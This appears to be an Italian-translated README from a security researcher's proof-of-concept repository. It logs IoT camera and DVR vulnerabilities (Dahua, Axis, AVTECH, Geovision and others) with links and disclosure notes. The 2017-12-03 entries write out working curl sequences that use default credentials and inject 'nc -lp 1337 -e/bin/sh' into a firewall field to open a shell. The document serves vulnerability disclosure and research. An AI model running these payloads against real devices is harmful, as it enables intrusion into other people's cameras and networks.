
Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.
PoC vari - Internet delle cose (in)sicure
Vale davvero la pena leggere queste schifose cose (in)sicure: https://ipvm.com/reports/security-exploits
2021-10-19
Tutto il merito a Watchful_IP (https://watchfulip.github.io/)
https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py
2021-10-06
Dettagli: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt
PoC: https://github.com/mcw0/DahuaConsole
2021-09-06
Due bypass di autenticazione indipendenti.
A causa dell'altissimo potenziale di un altro "Dahua mass hack", terrò i dettagli della Full Disclosure fino al 6 ottobre 2021.
Consiglio vivamente di aggiornare il firmware fino ad allora.
https://www.dahuasecurity.com/support/cybersecurity/details/957
2020-05-09
https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py
2020-02-29
https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py
2020-02-15
Contatto stabilito nel corso di questa settimana con Dahua PSIRT; sono stati forniti dettagli, PoC e prove per 23 diversi fornitori cloud. Seguirò anche il nuovo esperimento di Google Zero 'Policy and Disclosure: 2020 Edition' (dato che per me ha senso), il che significa che pubblicherò dopo 90 giorni, indipendentemente dal fatto che Dahua rilasci aggiornamenti prima o dopo il 09.05.2020 19:00 UTC (9 maggio 2020 19:00 UTC).
Dahua, per favore risolvete e rendete disponibili gli aggiornamenti prima di questa data...
Riferimento: Google Zero 'Policy and Disclosure: 2020 Edition': https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html
2020-02-10
Ho appena divulgato a Dahua PSIRT le perdite di credenziali (che finiscono in chiaro) dell'SDK Dahua; vediamo come prenderanno questa informazione. Abbastanza grave quando ci sono più di 20 diversi provider cloud coinvolti... 90 giorni che decorrono da oggi.
2020-01-20
Creato un nuovo repository dove ho intenzione di pubblicare alcuni strumenti.
Primo rilascio: Dahua-JSON-Debug-Console-v2.py
2019-10-06 (vecchia roba)
Rileva in modo anonimo il modello e la versione del firmware dei dispositivi Axis (1998 - 2019).
https://github.com/mcw0/PoC/blob/master/axis-detect.py
2019-08-20
https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py
2019-08-06
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
Tutti i dettagli tecnici insieme al PoC in Python saranno pubblicati qui il 20 agosto 2019.
2019-05-15
Stack overflow multipli, RCE, divulgazione di nome utente/password in chiaro e altro
https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py
2019-04-10
Questo script userà il protocollo binario P2P 'DHIP' di Dahua, che funziona sulle normali porte HTTP/HTTPS e su TCP/5000
Si collegherà alla 'Debug Console' interna dei dispositivi Dahua usando JSON (stesso tipo del vecchio debug su TCP/6789)
https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py
Divertitevi, bashis
2019-01-23
Saluti, è passato molto tempo senza pubblicazioni ...
Sono ancora in giro e porto avanti le mie ricerche, ma la novità è che sto anche cercando di collaborare con VDOO (https://www.vdoo.com/) per la gestione dei rapporti con i vendor, e questo ha purtroppo ritardato un po' il mio processo di Full Disclosure ...
Comunque, diverse ricerche interessanti in arrivo come Full Disclosure qui sul mio GitHub.
Con la collaborazione con VDOO posso dedicarmi a ciò che mi piace fare, senza perdere tempo con i vendor che (non vogliono | non capiscono | vogliono ignorare | vogliono ritardare | qualsiasi cosa).
Le ultime sono alcune cose su Reolink (https://reolink.com/), che troverete qui: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.
2018-06-18
AVTECH {DVR/NVR/IPC} Heap Overflow, API IPCP, RCE
https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt
https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py
2018-06-03
Reolink {IPC} RCE (autenticato)
https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py
2018-04-09
Shenzhen TVT Digital Technology Co. Ltd e OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
2018-03-05
AVTECH {DVR/NVR/IPC} RCE autenticato
https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py
2018-02-01
Geovision Inc. IP Camera/Video/Access Control - Esecuzioni remote di comandi multiple - Stack overflow multipli - Double free - Accesso non autorizzato https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
PoC di esecuzione remota di comandi su IP Camera e Video Server Geovision Inc. https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
2018-01-22
Il demone TelnetSwitch di Herospeed in esecuzione su TCP/787, per consentire l'attivazione di telnetd. Dove un piccolo stack overflow ci permette di sovrascrivere la password generata dinamicamente e abilitare telnetd. https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py
2018-01-15
Piccolo wrapper OpenSSL per iterare diverse chiavi di cifratura/digest e cifrari sulle immagini del firmware delle IPC Foscam. https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py
Deoffuscare stringhe/login/password/chiave crittografica in vari binari e librerie delle IPC Foscam https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py
2017-12-22
https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt
2017-12-14
https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt
Immagine qui: http://62.43.36.107:50021/Public/CCTV/GWSecu/GWSecu%20Updater%20para%20c%C3%A1maras/Firmware%20para%20c%C3%A1mara%20domo/
2017-12-05
https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c
2017-12-03
// Abilita 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Aggiungi a 'IP Filter' ed esegui
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Disattiva 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Rimuovi da 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
2017-12-03
// Abilita 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Aggiungi a 'IP Filter' ed esegui
curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Disattiva 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Rimuovi da 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
Nota: abbastanza sicuro che ci siano altri OEM che condividono lo stesso problema.
2017-12-01 Axis Communications MPQT/PACS Heap Overflow e Information Leakage https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
2017-11-13 Shell di privacy con reverse stunnel TLSv1 https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt
2017-11-13 Vivotek IP Cameras - Stack overflow remoto https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
2017-10-29 Uniview RCE e PoC di esportazione della configurazione https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt
2017-10-19 Un vecchio fuzzing dimenticato risalente al Q3/2016 che ha portato a RCE (PoC: remote connect back shell) e alla lettura remota di /etc/shadow. Segnalato ad Axis e corretto nel Q3/2016, lo pubblico comunque qui ora perché potrebbe essere un buon spunto. https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE
2017-10-17 Abilita / Disabilita Telnetd su Dahua (per le versioni più recenti del firmware) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py
2017-05-03
Ripubblicazione pubblica del PoC del backdoor Dahua https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
2017-03-20
Con la mia conoscenza recentemente acquisita dei dispositivi vulnerabili in circolazione, con un numero incredibile di oltre 1 milione di unità Dahua/OEM, conoscenza che proviene da un report di NSFOCUS e dalle mie ricerche su shodan.io.
Con questa conoscenza, non rilascerò il PoC in Python al pubblico come detto in precedenza per il 5 aprile, poiché non è necessario visto che il PoC è già stato verificato da IPVM e da altri ricercatori di sicurezza indipendenti.
Tuttavia, sono aperto a condividere il PoC con seri ricercatori di sicurezza, se lo desiderano; vi prego di contattarmi via e-mail fuori lista e di essere chiari su chi siete, così non vi scambierò per dei mendicanti, che ignoro.
Report di NSFOCUS: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/
/bashis
Avete notato i timestamp sulle patch di Dahua? Guardate gli screenshot da http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
Non solo NVR/DVR/IPC/HDCVI sono nella lista
Anche i sistemi di interfono, il VTO2000A è stato confermato http://www1.dahuasecurity.com/au/products/vto2000a-762.html